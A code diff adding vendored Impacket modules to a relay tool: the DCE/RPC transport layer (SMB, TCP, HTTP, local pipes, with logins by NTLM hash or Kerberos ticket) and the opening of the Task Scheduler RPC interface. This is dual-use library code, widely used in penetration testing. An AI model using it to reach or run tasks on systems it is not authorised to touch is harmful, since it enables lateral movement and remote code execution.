+from impacket.dcerpc.v5.rpcrt import DCERPCException, DCERPC_v5, DCERPC_v4
+from impacket.dcerpc.v5.rpch import RPCProxyClient, RPCProxyClientException, RPC_OVER_HTTP_v1, RPC_OVER_HTTP_v2
+from impacket.smbconnection import SMBConnection
+
+class DCERPCStringBinding:
+    parser = re.compile(r'(?:([a-fA-F0-9-]{8}(?:-[a-fA-F0-9-]{4}){3}-[a-fA-F0-9-]{12})@)?' # UUID (opt.)
+                        +'([_a-zA-Z0-9]*):' # Protocol Sequence
+                        +'([^\[]*)' # Network Address (opt.)
+                        +'(?:\[([^\]]*)\])?') # Endpoint and options (opt.)
+
+    def __init__(self, stringbinding):
+        match = DCERPCStringBinding.parser.match(stringbinding)
+        self.__uuid = match.group(1)
+        self.__ps = match.group(2)
+        self.__na = match.group(3)
+        options = match.group(4)
+        if options:
+            options = options.split(',')
+            
+            self.__endpoint = options[0]
+            try:
+                self.__endpoint.index('endpoint=')
+                self.__endpoint = self.__endpoint[len('endpoint='):]
+            except:
+                pass
+
+            self.__options = {}
+            for option in options[1:]:
+                vv = option.split('=', 1)
+                self.__options[vv[0]] = vv[1] if len(vv) > 1 else ''
+        else:
+            self.__endpoint = ''
+            self.__options = {}
+
+    def get_uuid(self):
+        return self.__uuid
+
+    def get_protocol_sequence(self):
+        return self.__ps
+
+    def get_network_address(self):
+        return self.__na
+
+    def set_network_address(self, addr):
+        self.__na = addr
+
+    def get_endpoint(self):
+        return self.__endpoint
+
+    def get_options(self):
+        return self.__options
+
+    def get_option(self, option_name):
+        return self.__options[option_name]
+
+    def is_option_set(self, option_name):
+        return option_name in self.__options
+
+    def unset_option(self, option_name):
+        del self.__options[option_name]
+
+    def __str__(self):
+        return DCERPCStringBindingCompose(self.__uuid, self.__ps, self.__na, self.__endpoint, self.__options)
+
+def DCERPCStringBindingCompose(uuid=None, protocol_sequence='', network_address='', endpoint='', options={}):
+    s = ''
+    if uuid:
+        s += uuid + '@'
+    s += protocol_sequence + ':'
+    if network_address:
+        s += network_address
+    if endpoint or options:
+        s += '[' + endpoint
+        if options:
+            s += ',' + ','.join([key if str(val) == '' else "=".join([key, str(val)]) for key, val in options.items()])
+        s += ']'
+
+    return s
+
+def DCERPCTransportFactory(stringbinding):
+    sb = DCERPCStringBinding(stringbinding)
+
+    na = sb.get_network_address()
+    ps = sb.get_protocol_sequence()
+    if 'ncadg_ip_udp' == ps:
+        port = sb.get_endpoint()
+        if port:
+            rpctransport = UDPTransport(na, int(port))
+        else:
+            rpctransport = UDPTransport(na)
+    elif 'ncacn_ip_tcp' == ps:
+        port = sb.get_endpoint()
+        if port:
+            rpctransport = TCPTransport(na, int(port))
+        else:
+            rpctransport = TCPTransport(na)
+    elif 'ncacn_http' == ps:
+        port = sb.get_endpoint()
+        if port:
+            rpctransport = HTTPTransport(na, int(port))
+        else:
+            rpctransport = HTTPTransport(na)
+    elif 'ncacn_np' == ps:
+        named_pipe = sb.get_endpoint()
+        if named_pipe:
+            named_pipe = named_pipe[len(r'\pipe'):]
+            rpctransport = SMBTransport(na, filename = named_pipe)
+        else:
+            rpctransport = SMBTransport(na)
+    elif 'ncalocal' == ps:
+        named_pipe = sb.get_endpoint()
+        rpctransport = LOCALTransport(filename = named_pipe)
+    else:
+        raise DCERPCException("Unknown protocol sequence.")
+
+    rpctransport.set_stringbinding(sb)
+    return rpctransport
+
+class DCERPCTransport:
+
+    DCERPC_class = DCERPC_v5
+
+    def __init__(self, remoteName, dstport):
+        self.__remoteName = remoteName
+        self.__remoteHost = remoteName
+        self.__dstport = dstport
+        self._stringbinding = None
+        self._max_send_frag = None
+        self._max_recv_frag = None
+        self._domain = ''
+        self._lmhash = ''
+        self._nthash = ''
+        self.__connect_timeout = None
+        self._doKerberos = False
+        self._username = ''
+        self._password = ''
+        self._domain   = ''
+        self._aesKey   = None
+        self._TGT      = None
+        self._TGS      = None
+        self._kdcHost  = None
+        self.set_credentials('','')
+        # Strict host validation - off by default and currently only for
+        # SMBTransport
+        self._strict_hostname_validation = False
+        self._validation_allow_absent = True
+        self._accepted_hostname = ''
+
+    def connect(self):
+        raise RuntimeError('virtual function')
+    def send(self,data=0, forceWriteAndx = 0, forceRecv = 0):
+        raise RuntimeError('virtual function')
+    def recv(self, forceRecv = 0, count = 0):
+        raise RuntimeError('virtual function')
+    def disconnect(self):
+        raise RuntimeError('virtual function')
+    def get_socket(self):
+        raise RuntimeError('virtual function')
+
+    def get_connect_timeout(self):
+        return self.__connect_timeout
+    def set_connect_timeout(self, timeout):
+        self.__connect_timeout = timeout
+
+    def getRemoteName(self):
+        return self.__remoteName
+
+    def setRemoteName(self, remoteName):
+        """This method only makes sense before connection for most protocols."""
+        self.__remoteName = remoteName
+
+    def getRemoteHost(self):
+        return self.__remoteHost
+
+    def setRemoteHost(self, remoteHost):
+        """This method only makes sense before connection for most protocols."""
+        self.__remoteHost = remoteHost
+
+    def get_dport(self):
+        return self.__dstport
+    def set_dport(self, dport):
+        """This method only makes sense before connection for most protocols."""
+        self.__dstport = dport
+
+    def get_stringbinding(self):
+        return self._stringbinding
+
+    def set_stringbinding(self, stringbinding):
+        self._stringbinding = stringbinding
+
+    def get_addr(self):
+        return self.getRemoteHost(), self.get_dport()
+    def set_addr(self, addr):
+        """This method only makes sense before connection for most protocols."""
+        self.setRemoteHost(addr[0])
+        self.set_dport(addr[1])
+
+    def set_kerberos(self, flag, kdcHost = None):
+        self._doKerberos = flag
+        self._kdcHost = kdcHost
+
+    def get_kerberos(self):
+        return self._doKerberos
+
+    def get_kdcHost(self):
+        return self._kdcHost
+
+    def set_max_fragment_size(self, send_fragment_size):
+        # -1 is default fragment size: 0 (don't fragment)
+        #  0 is don't fragment
+        #    other values are max fragment size
+        if send_fragment_size == -1:
+            self.set_default_max_fragment_size()
+        else:
+            self._max_send_frag = send_fragment_size
+
+    def set_hostname_validation(self, validate, accept_empty, hostname):
+        self._strict_hostname_validation = validate
+        self._validation_allow_absent = accept_empty
+        self._accepted_hostname = hostname
+
+    def set_default_max_fragment_size(self):
+        # default is 0: don't fragment.
+        # subclasses may override this method
+        self._max_send_frag = 0
+
+    def get_credentials(self):
+        return (
+            self._username,
+            self._password,
+            self._domain,
+            self._lmhash,
+            self._nthash,
+            self._aesKey,
+            self._TGT,
+            self._TGS)
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        self._username = username
+        self._password = password
+        self._domain   = domain
+        self._aesKey   = aesKey
+        self._TGT      = TGT
+        self._TGS      = TGS
+        if lmhash != '' or nthash != '':
+            if len(lmhash) % 2:
+                lmhash = '0%s' % lmhash
+            if len(nthash) % 2:
+                nthash = '0%s' % nthash
+            try: # just in case they were converted already
+               self._lmhash = binascii.unhexlify(lmhash)
+               self._nthash = binascii.unhexlify(nthash)
+            except:
+               self._lmhash = lmhash
+               self._nthash = nthash
+               pass
+
+    def doesSupportNTLMv2(self):
+        # By default we'll be returning the library's default. Only on SMB Transports we might be able to know it beforehand
+        return ntlm.USE_NTLMv2
+
+    def get_dce_rpc(self):
+        return DCERPC_v5(self)
+
+class UDPTransport(DCERPCTransport):
+    "Implementation of ncadg_ip_udp protocol sequence"
+
+    DCERPC_class = DCERPC_v4
+
+    def __init__(self, remoteName, dstport = 135):
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        self.__socket = 0
+        self.set_connect_timeout(30)
+        self.__recv_addr = ''
+
+    def connect(self):
+        try:
+            af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_DGRAM)[0]
+            self.__socket = socket.socket(af, socktype, proto)
+            self.__socket.settimeout(self.get_connect_timeout())
+        except socket.error as msg:
+            self.__socket = None
+            raise DCERPCException("Could not connect: %s" % msg)
+
+        return 1
+
+    def disconnect(self):
+        try:
+            self.__socket.close()
+        except socket.error:
+            self.__socket = None
+            return 0
+        return 1
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        self.__socket.sendto(data, (self.getRemoteHost(), self.get_dport()))
+
+    def recv(self, forceRecv = 0, count = 0):
+        buffer, self.__recv_addr = self.__socket.recvfrom(8192)
+        return buffer
+
+    def get_recv_addr(self):
+        return self.__recv_addr
+
+    def get_socket(self):
+        return self.__socket
+
+class TCPTransport(DCERPCTransport):
+    """Implementation of ncacn_ip_tcp protocol sequence"""
+
+    def __init__(self, remoteName, dstport = 135):
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        self.__socket = 0
+        self.set_connect_timeout(30)
+
+    def connect(self):
+        af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_STREAM)[0]
+        self.__socket = socket.socket(af, socktype, proto)
+        try:
+            self.__socket.settimeout(self.get_connect_timeout())
+            self.__socket.connect(sa)
+        except socket.error as msg:
+            self.__socket.close()
+            raise DCERPCException("Could not connect: %s" % msg)
+        return 1
+
+    def disconnect(self):
+        try:
+            self.__socket.close()
+        except socket.error:
+            self.__socket = None
+            return 0
+        return 1
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        if self._max_send_frag:
+            offset = 0
+            while 1:
+                toSend = data[offset:offset+self._max_send_frag]
+                if not toSend:
+                    break
+                self.__socket.send(toSend)
+                offset += len(toSend)
+        else:
+            self.__socket.send(data)
+
+    def recv(self, forceRecv = 0, count = 0):
+        if count:
+            buffer = b''
+            while len(buffer) < count:
+               buffer += self.__socket.recv(count-len(buffer))
+        else:
+            buffer = self.__socket.recv(8192)
+        return buffer
+
+    def get_socket(self):
+        return self.__socket
+
+class HTTPTransport(TCPTransport, RPCProxyClient):
+    """Implementation of ncacn_http protocol sequence"""
+
+    def __init__(self, remoteName=None, dstport=593):
+        self._useRpcProxy = False
+        self._rpcProxyUrl = None
+        self._transport   = TCPTransport
+        self._version     = RPC_OVER_HTTP_v2
+
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        RPCProxyClient.__init__(self, remoteName, dstport)
+        self.set_connect_timeout(30)
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        return self._transport.set_credentials(self, username, password,
+            domain, lmhash, nthash, aesKey, TGT, TGS)
+
+    def rpc_proxy_init(self):
+        self._useRpcProxy = True
+        self._transport   = RPCProxyClient
+
+    def set_rpc_proxy_url(self, url):
+        self.rpc_proxy_init()
+        self._rpcProxyUrl = urlparse(url)
+
+    def get_rpc_proxy_url(self):
+        return urlunparse(self._rpcProxyUrl)
+
+    def set_stringbinding(self, set_stringbinding):
+        DCERPCTransport.set_stringbinding(self, set_stringbinding)
+
+        if self._stringbinding.is_option_set("RpcProxy"):
+            self.rpc_proxy_init()
+
+            rpcproxy = self._stringbinding.get_option("RpcProxy").split(":")
+
+            if rpcproxy[1] == '443':
+                self.set_rpc_proxy_url('https://%s/rpc/rpcproxy.dll' % rpcproxy[0])
+            elif rpcproxy[1] == '80':
+                self.set_rpc_proxy_url('http://%s/rpc/rpcproxy.dll' % rpcproxy[0])
+            else:
+                # 2.1.2.1
+                # RPC over HTTP always uses port 80 for HTTP traffic and port 443 for HTTPS traffic.
+                # But you can use set_rpc_proxy_url method to set any URL / query you want.
+                raise DCERPCException("RPC Proxy port must be 80 or 443")
+
+    def connect(self):
+        if self._useRpcProxy == False:
+            # Connecting directly to the ncacn_http port
+            #
+            # Here we using RPC over HTTPv1 instead complex RPC over HTTP v2 syntax
+            # RPC over HTTP v2 here can be implemented in the future
+            self._version = RPC_OVER_HTTP_v1
+
+            TCPTransport.connect(self)
+
+            # Reading legacy server response
+            data = self.get_socket().recv(8192)
+
+            if data != b'ncacn_http/1.0':
+                raise DCERPCException("%s:%s service is not ncacn_http" % (self.__remoteName, self.__dstport))
+        else:
+            RPCProxyClient.connect(self)
+
+    def send(self, data, forceWriteAndx=0, forceRecv=0):
+        return self._transport.send(self, data, forceWriteAndx, forceRecv)
+
+    def recv(self, forceRecv=0, count=0):
+        return self._transport.recv(self, forceRecv, count)
+
+    def get_socket(self):
+        if self._useRpcProxy == False:
+            return TCPTransport.get_socket(self)
+        else:
+            raise DCERPCException("This method is not supported for RPC Proxy connections")
+
+    def disconnect(self):
+        return self._transport.disconnect(self)
+
+class SMBTransport(DCERPCTransport):
+    """Implementation of ncacn_np protocol sequence"""
+
+    def __init__(self, remoteName, dstport=445, filename='', username='', password='', domain='', lmhash='', nthash='',
+                 aesKey='', TGT=None, TGS=None, remote_host='', smb_connection=0, doKerberos=False, kdcHost=None):
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        self.__socket = None
+        self.__tid = 0
+        self.__filename = filename
+        self.__handle = 0
+        self.__pending_recv = 0
+        self.set_credentials(username, password, domain, lmhash, nthash, aesKey, TGT, TGS)
+        self._doKerberos = doKerberos
+        self._kdcHost = kdcHost
+
+        if remote_host != '':
+            self.setRemoteHost(remote_host)
+
+        if smb_connection == 0:
+            self.__existing_smb = False
+        else:
+            self.__existing_smb = True
+            self.set_credentials(*smb_connection.getCredentials())
+
+        self.__prefDialect = None
+        self.__smb_connection = smb_connection
+        self.set_connect_timeout(30)
+
+    def preferred_dialect(self, dialect):
+        self.__prefDialect = dialect
+
+    def setup_smb_connection(self):
+        if not self.__smb_connection:
+            self.__smb_connection = SMBConnection(self.getRemoteName(), self.getRemoteHost(), sess_port=self.get_dport(),
+                                                  preferredDialect=self.__prefDialect, timeout=self.get_connect_timeout())
+            if self._strict_hostname_validation:
+                self.__smb_connection.setHostnameValidation(self._strict_hostname_validation, self._validation_allow_absent, self._accepted_hostname)
+
+    def connect(self):
+        # Check if we have a smb connection already setup
+        if self.__smb_connection == 0:
+            self.setup_smb_connection()
+            if self._doKerberos is False:
+                self.__smb_connection.login(self._username, self._password, self._domain, self._lmhash, self._nthash)
+            else:
+                self.__smb_connection.kerberosLogin(self._username, self._password, self._domain, self._lmhash,
+                                                    self._nthash, self._aesKey, kdcHost=self._kdcHost, TGT=self._TGT,
+                                                    TGS=self._TGS)
+        self.__tid = self.__smb_connection.connectTree('IPC$')
+        self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
+        self.__socket = self.__smb_connection.getSMBServer().get_socket()
+        return 1
+
+    def disconnect(self):
+        self.__smb_connection.disconnectTree(self.__tid)
+        # If we created the SMB connection, we close it, otherwise
+        # that's up for the caller
+        if self.__existing_smb is False:
+            self.__smb_connection.logoff()
+            self.__smb_connection.close()
+            self.__smb_connection = 0
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        if self._max_send_frag:
+            offset = 0
+            while 1:
+                toSend = data[offset:offset+self._max_send_frag]
+                if not toSend:
+                    break
+                self.__smb_connection.writeFile(self.__tid, self.__handle, toSend, offset = offset)
+                offset += len(toSend)
+        else:
+            self.__smb_connection.writeFile(self.__tid, self.__handle, data)
+        if forceRecv:
+            self.__pending_recv += 1
+
+    def recv(self, forceRecv = 0, count = 0 ):
+        if self._max_send_frag or self.__pending_recv:
+            # _max_send_frag is checked because it's the same condition we checked
+            # to decide whether to use write_andx() or send_trans() in send() above.
+            if self.__pending_recv:
+                self.__pending_recv -= 1
+            return self.__smb_connection.readFile(self.__tid, self.__handle, bytesToRead = self._max_recv_frag)
+        else:
+            return self.__smb_connection.readFile(self.__tid, self.__handle)
+
+    def get_smb_connection(self):
+        return self.__smb_connection
+
+    def set_smb_connection(self, smb_connection):
+        self.__smb_connection = smb_connection
+        self.set_credentials(*smb_connection.getCredentials())
+        self.__existing_smb = True
+
+    def get_smb_server(self):
+        # Raw Access to the SMBServer (whatever type it is)
+        return self.__smb_connection.getSMBServer()
+
+    def get_socket(self):
+        return self.__socket
+
+    def doesSupportNTLMv2(self):
+        return self.__smb_connection.doesSupportNTLMv2()
+
+class LOCALTransport(DCERPCTransport):
+    """
+    Implementation of ncalocal protocol sequence, not the same
+    as ncalrpc (I'm not doing LPC just opening the local pipe)
+    """
+
+    def __init__(self, filename = ''):
+        DCERPCTransport.__init__(self, '', 0)
+        self.__filename = filename
+        self.__handle = 0
+
+    def connect(self):
+        if self.__filename.upper().find('PIPE') < 0:
+            self.__filename = '\\PIPE\\%s' % self.__filename
+        self.__handle = os.open('\\\\.\\%s' % self.__filename, os.O_RDWR|os.O_BINARY)
+        return 1
+
+    def disconnect(self):
+        os.close(self.__handle)
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        os.write(self.__handle, data)
+
+    def recv(self, forceRecv = 0, count = 0 ):
+        data = os.read(self.__handle, 65535)
+        return data

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/tsch.py

@@ -0,0 +1,799 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-TSCH] ITaskSchedulerService Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR, NULL, GUID, PSYSTEMTIME, SYSTEMTIME
+from impacket.structure import Structure
+from impacket import hresult_errors, system_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_TSCHS  = uuidtup_to_bin(('86D35949-83C9-4044-B424-DB363231FD0C','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        elif key & 0xffff in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key & 0xffff][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key & 0xffff][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.3.1 Constant Values
+CNLEN = 15
+DNLEN = CNLEN
+UNLEN = 256
+MAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1)
+
+# 2.3.7 Flags
+TASK_FLAG_INTERACTIVE                  = 0x1
+TASK_FLAG_DELETE_WHEN_DONE             = 0x2
+TASK_FLAG_DISABLED                     = 0x4
+TASK_FLAG_START_ONLY_IF_IDLE           = 0x10
+TASK_FLAG_KILL_ON_IDLE_END             = 0x20
+TASK_FLAG_DONT_START_IF_ON_BATTERIES   = 0x40
+TASK_FLAG_KILL_IF_GOING_ON_BATTERIES   = 0x80
+TASK_FLAG_RUN_ONLY_IF_DOCKED           = 0x100
+TASK_FLAG_HIDDEN                       = 0x200
+TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
+TASK_FLAG_RESTART_ON_IDLE_RESUME       = 0x800
+TASK_FLAG_SYSTEM_REQUIRED              = 0x1000
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON        = 0x2000
+
+# 2.3.9 TASK_LOGON_TYPE
+TASK_LOGON_NONE                          = 0
+TASK_LOGON_PASSWORD                      = 1
+TASK_LOGON_S4U                           = 2
+TASK_LOGON_INTERACTIVE_TOKEN             = 3
+TASK_LOGON_GROUP                         = 4
+TASK_LOGON_SERVICE_ACCOUNT               = 5
+TASK_LOGON_INTERACTIVE_TOKEN_OR_PASSWORD = 6
+
+# 2.3.13 TASK_STATE
+TASK_STATE_UNKNOWN  = 0
+TASK_STATE_DISABLED = 1
+TASK_STATE_QUEUED   = 2
+TASK_STATE_READY    = 3
+TASK_STATE_RUNNING  = 4
+
+# 2.4.1 FIXDLEN_DATA
+SCHED_S_TASK_READY         = 0x00041300
+SCHED_S_TASK_RUNNING       = 0x00041301
+SCHED_S_TASK_NOT_SCHEDULED = 0x00041301
+
+# 2.4.2.11 Triggers
+TASK_TRIGGER_FLAG_HAS_END_DATE         = 0
+TASK_TRIGGER_FLAG_KILL_AT_DURATION_END = 0
+TASK_TRIGGER_FLAG_DISABLED             = 0
+
+# ToDo: Change this to enums
+ONCE                 = 0
+DAILY                = 1
+WEEKLY               = 2
+MONTHLYDATE          = 3
+MONTHLYDOW           = 4
+EVENT_ON_IDLE        = 5
+EVENT_AT_SYSTEMSTART = 6
+EVENT_AT_LOGON       = 7
+
+SUNDAY    = 0
+MONDAY    = 1
+TUESDAY   = 2
+WEDNESDAY = 3
+THURSDAY  = 4
+FRIDAY    = 5
+SATURDAY  = 6
+
+JANUARY   = 1
+FEBRUARY  = 2
+MARCH     = 3
+APRIL     = 4
+MAY       = 5
+JUNE      = 6
+JULY      = 7
+AUGUST    = 8
+SEPTEMBER = 9
+OCTOBER   = 10
+NOVEMBER  = 11
+DECEMBER  = 12
+
+# 2.4.2.11.8 MONTHLYDOW Trigger
+FIRST_WEEK  = 1
+SECOND_WEEK = 2
+THIRD_WEEK  = 3
+FOURTH_WEEK = 4
+LAST_WEEK   = 5
+
+# 2.3.12 TASK_NAMES
+TASK_NAMES = LPWSTR
+
+# 3.2.5.4.2 SchRpcRegisterTask (Opnum 1)
+TASK_VALIDATE_ONLY                = 1<<(31-31)
+TASK_CREATE                       = 1<<(31-30)
+TASK_UPDATE                       = 1<<(31-29)
+TASK_DISABLE                      = 1<<(31-28)
+TASK_DON_ADD_PRINCIPAL_ACE        = 1<<(31-27)
+TASK_IGNORE_REGISTRATION_TRIGGERS = 1<<(31-26)
+
+# 3.2.5.4.5 SchRpcSetSecurity (Opnum 4)
+TASK_DONT_ADD_PRINCIPAL_ACE = 1<<(31-27)
+SCH_FLAG_FOLDER             = 1<<(31-2)
+SCH_FLAG_TASK               = 1<<(31-1) 
+
+# 3.2.5.4.7 SchRpcEnumFolders (Opnum 6)
+TASK_ENUM_HIDDEN = 1
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+TASK_RUN_AS_SELF            = 1<<(31-31)
+TASK_RUN_IGNORE_CONSTRAINTS = 1<<(31-30)
+TASK_RUN_USE_SESSION_ID     = 1<<(31-29)
+TASK_RUN_USER_SID           = 1<<(31-28)
+
+# 3.2.5.4.18 SchRpcGetTaskInfo (Opnum 17)
+SCH_FLAG_STATE            = 1<<(31-3)
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.3.12 TASK_NAMES
+class TASK_NAMES_ARRAY(NDRUniConformantArray):
+    item = TASK_NAMES
+
+class PTASK_NAMES_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',TASK_NAMES_ARRAY),
+    )
+
+class WSTR_ARRAY(NDRUniConformantArray):
+    item = WSTR
+
+class PWSTR_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',WSTR_ARRAY),
+    )
+
+class GUID_ARRAY(NDRUniConformantArray):
+    item = GUID
+
+class PGUID_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',GUID_ARRAY),
+    )
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+class SYSTEMTIME_ARRAY(NDRUniConformantArray):
+    item = SYSTEMTIME
+
+class PSYSTEMTIME_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',SYSTEMTIME_ARRAY),
+    )
+
+# 2.3.8 TASK_USER_CRED
+class TASK_USER_CRED(NDRSTRUCT):
+    structure =  (
+        ('userId',LPWSTR),
+        ('password',LPWSTR),
+        ('flags',DWORD),
+    )
+
+class TASK_USER_CRED_ARRAY(NDRUniConformantArray):
+    item = TASK_USER_CRED
+
+class LPTASK_USER_CRED_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',TASK_USER_CRED_ARRAY),
+    )
+
+# 2.3.10 TASK_XML_ERROR_INFO
+class TASK_XML_ERROR_INFO(NDRSTRUCT):
+    structure =  (
+        ('line',DWORD),
+        ('column',DWORD),
+        ('node',LPWSTR),
+        ('value',LPWSTR),
+    )
+
+class PTASK_XML_ERROR_INFO(NDRPOINTER):
+    referent = (
+        ('Data',TASK_XML_ERROR_INFO),
+    )
+
+# 2.4.1 FIXDLEN_DATA
+class FIXDLEN_DATA(Structure):
+    structure = (
+        ('Product Version','<H=0'),
+        ('File Version','<H=0'),
+        ('Job uuid','16s="'),
+        ('App Name Len Offset','<H=0'),
+        ('Trigger Offset','<H=0'),
+        ('Error Retry Count','<H=0'),
+        ('Error Retry Interval','<H=0'),
+        ('Idle Deadline','<H=0'),
+        ('Idle Wait','<H=0'),
+        ('Priority','<L=0'),
+        ('Maximum Run Time','<L=0'),
+        ('Exit Code','<L=0'),
+        ('Status','<L=0'),
+        ('Flags','<L=0'),
+    )
+
+# 2.4.2.11 Triggers
+class TRIGGERS(Structure):
+    structure = (
+        ('Trigger Size','<H=0'),
+        ('Reserved1','<H=0'),
+        ('Begin Year','<H=0'),
+        ('Begin Month','<H=0'),
+        ('Begin Day','<H=0'),
+        ('End Year','<H=0'),
+        ('End Month','<H=0'),
+        ('End Day','<H=0'),
+        ('Start Hour','<H=0'),
+        ('Start Minute','<H=0'),
+        ('Minutes Duration','<L=0'),
+        ('Minutes Interval','<L=0'),
+        ('Flags','<L=0'),
+        ('Trigger Type','<L=0'),
+        ('TriggerSpecific0','<H=0'),
+        ('TriggerSpecific1','<H=0'),
+        ('TriggerSpecific2','<H=0'),
+        ('Padding','<H=0'),
+        ('Reserved2','<H=0'),
+        ('Reserved3','<H=0'),
+    )
+
+# 2.4.2.11.6 WEEKLY Trigger
+class WEEKLY(Structure):
+    structure = (
+        ('Trigger Type','<L=0'),
+        ('Weeks Interval','<H=0'),
+        ('DaysOfTheWeek','<H=0'),
+        ('Unused','<H=0'),
+        ('Padding','<H=0'),
+    )
+
+# 2.4.2.11.7 MONTHLYDATE Trigger
+class MONTHLYDATE(Structure):
+    structure = (
+        ('Trigger Type','<L=0'),
+        ('Days','<L=0'),
+        ('Months','<H=0'),
+        ('Padding','<H=0'),
+    )
+
+# 2.4.2.11.8 MONTHLYDOW Trigger
+class MONTHLYDOW(Structure):
+    structure = (
+        ('Trigger Type','<L=0'),
+        ('WhichWeek','<H=0'),
+        ('DaysOfTheWeek','<H=0'),
+        ('Months','<H=0'),
+        ('Padding','<H=0'),
+        ('Reserved2','<H=0'),
+        ('Reserved3','<H=0'),
+    )
+
+# 2.4.2.12 Job Signature
+class JOB_SIGNATURE(Structure):
+    structure = (
+        ('SignatureVersion','<HH0'),
+        ('MinClientVersion','<H=0'),
+        ('Signature','64s="'),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.4.1 SchRpcHighestVersion (Opnum 0)
+class SchRpcHighestVersion(NDRCALL):
+    opnum = 0
+    structure = (
+    )
+
+class SchRpcHighestVersionResponse(NDRCALL):
+    structure = (
+        ('pVersion', DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.2 SchRpcRegisterTask (Opnum 1)
+class SchRpcRegisterTask(NDRCALL):
+    opnum = 1
+    structure = (
+        ('path', LPWSTR),
+        ('xml', WSTR),
+        ('flags', DWORD),
+        ('sddl', LPWSTR),
+        ('logonType', DWORD),
+        ('cCreds', DWORD),
+        ('pCreds', LPTASK_USER_CRED_ARRAY),
+    )
+
+class SchRpcRegisterTaskResponse(NDRCALL):
+    structure = (
+        ('pActualPath', LPWSTR),
+        ('pErrorInfo', PTASK_XML_ERROR_INFO),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.3 SchRpcRetrieveTask (Opnum 2)
+class SchRpcRetrieveTask(NDRCALL):
+    opnum = 2
+    structure = (
+        ('path', WSTR),
+        ('lpcwszLanguagesBuffer', WSTR),
+        ('pulNumLanguages', DWORD),
+    )
+
+class SchRpcRetrieveTaskResponse(NDRCALL):
+    structure = (
+        ('pXml', LPWSTR),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.4 SchRpcCreateFolder (Opnum 3)
+class SchRpcCreateFolder(NDRCALL):
+    opnum = 3
+    structure = (
+        ('path', WSTR),
+        ('sddl', LPWSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcCreateFolderResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.5 SchRpcSetSecurity (Opnum 4)
+class SchRpcSetSecurity(NDRCALL):
+    opnum = 4
+    structure = (
+        ('path', WSTR),
+        ('sddl', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcSetSecurityResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.6 SchRpcGetSecurity (Opnum 5)
+class SchRpcGetSecurity(NDRCALL):
+    opnum = 5
+    structure = (
+        ('path', WSTR),
+        ('securityInformation', DWORD),
+    )
+
+class SchRpcGetSecurityResponse(NDRCALL):
+    structure = (
+        ('sddl',LPWSTR),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.7 SchRpcEnumFolders (Opnum 6)
+class SchRpcEnumFolders(NDRCALL):
+    opnum = 6
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+        ('startIndex', DWORD),
+        ('cRequested', DWORD),
+    )
+
